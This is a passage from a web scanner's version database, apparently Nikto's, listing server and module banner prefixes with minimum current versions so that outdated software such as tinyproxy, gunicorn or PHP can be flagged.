@CURRENT_VER)\"\n\"600921\",\"CatWalk/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600922\",\"CERNhttpd/\",\"3.0.A(Unix)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600923\",\"mod_transform/\",\"0.6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600924\",\"mod_auth_ianus_sso/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600925\",\"LANDeskManagementAgent/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600926\",\"WebKnight/\",\"2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600927\",\"AOLServer/\",\"4.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600928\",\"SE/\",\"0.5.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600929\",\"Sun-Java-System-Web-Proxy-Server/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600931\",\"iSpit/\",\"1.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600932\",\"Phusion_Passenger/\",\"6.0.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600933\",\"Sun Java System Application Server \",\"9.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600934\",\"tinyproxy/\",\"1.6.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600935\",\"ntop/\",\"3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600936\",\"Mono.WebServer2/\",\"6.4.0.1121\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600937\",\"mod_log_online/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600938\",\"mod_apreq2-20050712/\",\"2.1.3-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600939\",\"JSF/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600940\",\"HTTPGW/\",\"1.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600941\",\"AAISP/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600942\",\"AppleIDiskServer-\",\"1G301009\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600943\",\"Apusic/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600944\",\"cheyenne/\",\"2.2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600945\",\"GlobalSCAPE-EFTServer/\",\"6.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600946\",\"GlobalSCAPE-SecureServer/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600947\",\"InteSoft-ASPAccelerator/\",\"3.7.5000.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600948\",\"iPyramid.system2/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600949\",\"MailEnable-HTTP/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600950\",\"mod_copstng/\",\"2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600951\",\"mod_ddmh/\",\"0.0.16\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600952\",\"mod_defer/\",\"0.1.lk\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600953\",\"mod_dp20/\",\"0.99.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600954\",\"mod_gnutls/\",\"0.8.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600955\",\"mod_lisp2/\",\"1.3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600956\",\"mod_top/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600957\",\"mod_vhost_online/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600958\",\"ModemNV3/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600959\",\"Simple-Server/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600960\",\"TinyHTTPProxy/\",\"0.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600962\",\"WebMail/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600963\",\"WWW-KODEKS/\",\"4.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600964\",\"YTS/\",\"1.20.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600965\",\"OpenCms/\",\"10.5.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600966\",\"Mbedthis-AppWeb/\",\"2.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600967\",\"WebProxy/\",\"5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600968\",\"MicrosoftIIS/\",\".6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600969\",\"Cherokee/\",\"1.2.104\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600970\",\"debut/\",\"1.08\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600971\",\"DnionOS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600972\",\"FAV-WebSRV/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600973\",\"gorgona/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600974\",\"HASPLM/\",\"13.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600975\",\"IntotoHttpServer//\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600976\",\"ISS/\",\"7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600977\",\"LotusExpeditorWebContainer/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600978\",\"mod_fcgid/\",\"2.3.10-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600979\",\"mod_scgi_pubsub/\",\"1.11-pubsub\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600980\",\"mod_vhs/\",\"1.0.32\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600981\",\"PowerBoutique/\",\"2.2.3/10.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600982\",\"RemotelyAnywhere/\",\"8.0.668\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600983\",\"SERMEPAServer/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600984\",\"TongWeb-Director/\",\"4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600985\",\"uServ/\",\"1.5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600986\",\"AdventAPAuthS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600987\",\"CPLIMS/\",\"3.0.8.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600988\",\"HDSHi-TrackServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600989\",\"JuniperNetworksNitroCache/v\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600990\",\"MochiWeb/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600991\",\"SWS/\",\"3.10.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600992\",\"bit_asic/\",\"3.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600993\",\"ASERVER/\",\"1.0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600994\",\"BarracudaHTTP2.0/\",\"2.2.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600995\",\"HZV/\",\"2009\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600996\",\"HintSoftWS/\",\"1.0.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600998\",\"LiveWorld/\",\"cc_2_048\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600999\",\"NIServiceLocator/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601000\",\"PowerHomeWebserver/\",\"2.1b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601001\",\"Seminole/\",\"2.64\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601002\",\"Serv-U/\",\"11.3.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601003\",\"SiemensGigaset-Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601004\",\"TWebAP/\",\"2.1.2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601005\",\"TornadoServer/\",\"2.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601006\",\"W3MFC/\",\"1.68\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601007\",\"WebROaR-\",\"0.3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601008\",\"WingFTPServer/\",\"3.5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601009\",\"afts/\",\"0.9.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601010\",\"corehttp-\",\"0.5.3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601011\",\"dhttpd/\",\"1.02a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601012\",\"gSOAP/\",\"2.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601013\",\"mod_apreq2-20051231/\",\"2.6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601014\",\"mod_flog/\",\"0.4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601015\",\"mod_hcgi/\",\"0.9.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601016\",\"mod_musicindex/\",\"1.2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601017\",\"mod_ort/\",\"1.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601018\",\"mod_qos_control/\",\"7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601020\",\"sw-cp-server/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601021\",\"Oracle-iPlanet-Web-Server/\",\"7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601022\",\"CVOS/\",\"3.9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601023\",\"Zeus/\",\"6_0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601024\",\"mod_lo/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601025\",\"mod_ruid2/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601026\",\"mod_cluster/\",\"1.3.12.Final\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601027\",\"mod_aspdotnet/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601028\",\"mod_antiloris/\",\"0.6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601029\",\"PRTG/\",\"9.1.3.1792\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601030\",\"DMCRUIS/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601031\",\"Easy-WebServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601032\",\"EdgePrism/\",\"4.0.10.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601033\",\"FlashCom/\",\"3.5.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601034\",\"sqlmap/\",\"1.1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601035\",\"IOSFirewallHTTP/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601036\",\"IPG/\",\"7000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601037\",\"KWS/\",\"2009\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601038\",\"KWS2009/\",\"12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601039\",\"junction/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601040\",\"LITBWS/\",\"1.0.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601041\",\"Beacon/\",\"3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601042\",\"Asterisk/\",\"1.8.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601043\",\"BinarySEC/\",\"3.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601044\",\"CentileEmbeddedHTTPSdserver/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601046\",\"cPNginx.Co/\",\"0.8.5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601047\",\"Dahlia/\",\"1.0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601048\",\"DataONTAP/\",\"7.3.2P7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601049\",\"Formilux/\",\"0.1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601050\",\"gunicorn/\",\"0.14.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601051\",\"HBS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601052\",\"HOJ-WebServer/\",\"0.2.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601053\",\"HTTPProxy/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601054\",\"ipOS/\",\"7.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601055\",\"IQhttpD/\",\"1.007oct2007\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601056\",\"JavaPseudoHttpd/\",\"0.4.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601057\",\"LiveCache/\",\"2.4a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601058\",\"LuCId-HTTPd/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601059\",\"m4vh/\",\"1.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601060\",\"mini-http/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601061\",\"nCore/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601062\",\"NetworkActiv-Web-Server/\",\"3.5.16\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601063\",\"nginxvta/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601064\",\"Noelios-Restlet-Engine/\",\"1.0rc3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601065\",\"OwilAppserv/\",\"1.30\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601066\",\"PHP5/\",\"5.6.33\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). PHP 5.5.18, 5.4.34 and 5.3.29 are also current.\"\n\"601067\",\"POSIXDLNADOC/\",\"1.50UPnP/1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601068\",\"qjy168/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601069\",\"Rocket1.0.6aPython/\",\"2.6.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601070\",\"SAPNetWeaverApplicationServer/\",\"ABAP701\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601072\",\"TembriaWebServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601073\",\"TongWebApplicationServer/\",\"4.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601074\",\"TUNIX-httpscreen/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601075\",\"TwistedWeb/\",\"11.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601076\",\"uhttpd/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601077\",\"UltiDevCassini/\",\"2.1.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601078\",\"WebMod/\",\"0.48\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601079\",\"xrl-thttpd/\",\"2.25b08jan2011\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601080\",\"PanWebServer/\",\"2.4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601081\",\"mod_put/\",\"2.0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601082\",\"mod_qos/\",\"11.70\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601083\",\"ScriptLogic.Webserver/\",\"8.0.0.440\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601084\",\"Phusion Passenger/\",\"4.0.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601085\",\"Zope/\",\"(Zope/2.13.29\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601086\",\"DMRND/\",\"0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601087\",\"HelixMobileServer/\",\"14.3.0.268\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601088\",\"JoostNRG/\",\"0.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601089\",\"KDH/\",\"6300.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601090\",\"mod_cntr/\",\"2.5.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601091\",\"mod_nss/\",\"2.4.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601092\",\"mod_spy/\",\"1.3.24\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601093\",\"Mundu/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601094\",\"OmnitureDC/\",\"2.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601095\",\"PPEngine/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601096\",\"SouthRiver/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601097\",\"Sun-ILOM-Web-Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601098\",\"uc-httpd/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601099\",\"ymweb/\",\"1.5.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601100\",\"ZhihuServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601101\",\"GlassFish Server Open Source Edition \",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601102\",\"JPMC\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601103\",\"Rehwork Webserver \",\"v7.3b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601104\",\"TUNHS \",\"v.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601105\",\"TVP Portal \",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601106\",\"Viajeros2-\",\"ECFE4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601107\",\"Xtransform-\",\"0.1.1-beta\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601108\",\"tws\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601109\",\"IWS/\",\"2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601110\",\"Moo/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601111\",\"mod_apreq2-20090110/\",\"2.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601112\",\"mod_fastcgisa/\",\"2.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601113\",\"LMLmod_ssl/\",\"2.8.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601114\",\"37wan/\",\"9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601115\",\"3fe/\",\"2.7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601116\",\"ATS/\",\"3.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601117\",\"AderleeWebPortal/\",\"7.0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601118\",\"ArcWS/\",\"4.0.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601119\",\"AtyponWS/\",\"7.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601120\",\"BSWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601121\",\"BWM/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601122\",\"Become/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601123\",\"BlueDragonServer/\",\"7.1.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601124\",\"CHINACACHE/\",\"CCN-BJ-3-57J\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601125\",\"CPC/\",\"2.2.17\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601126\",\"CWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601127\",\"ClaraPXWebv2.1/\",\"FMAK\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601128\",\"CloobFramework/\",\"1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601129\",\"Cnaws/\",\"1.0.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601130\",\"ComsenzWS/\",\"1.0.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601131\",\"DDWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601132\",\"DHNWS/\",\"2.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601133\",\"DME/\",\"2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601134\",\"DMS/\",\"1.0.42\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601135\",\"DZSERVER/\",\"0.1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601136\",\"DayServletEngine/\",\"4.1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601137\",\"Dict/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601138\",\"FWS/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601139\",\"FlightAware/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601140\",\"FreeFind/\",\"8.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601141\",\"FriendFeedServer/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601142\",\"GNWS/\",\"0.7.42\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601143\",\"GWS-GRFE/\",\"0.50\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601144\",\"Geobytes-GeoSelect/\",\"3.0.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601145\",\"Haaretz/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601146\",\"HavenServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601147\",\"IAGR/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601148\",\"IBM_HTTP_SERVER/\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601149\",\"Inyoka/\",\"rev-5723\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601150\",\"JWS/\",\"2010\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601151\",\"Jrun/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601152\",\"KA/\",\"0.03\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601153\",\"KYOWS/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601154\",\"Kerio_WebSTAR/\",\"5.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601156\",\"LOVE/\",\"4_3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601157\",\"Lucy-HTTPd/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601158\",\"MII-WSD/\",\"1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601159\",\"MWS/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601160\",\"Meishi/\",\"1.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601161\",\"MobileAware-MF/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601164\",\"NWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601165\",\"OKWS/\",\"3.1.4.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601166\",\"Ocamlnet/\",\"2.2.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601167\",\"OmnitureAWS/\",\"2.0.0\",\"@RUNNING_VER appears to be outdated (current is at 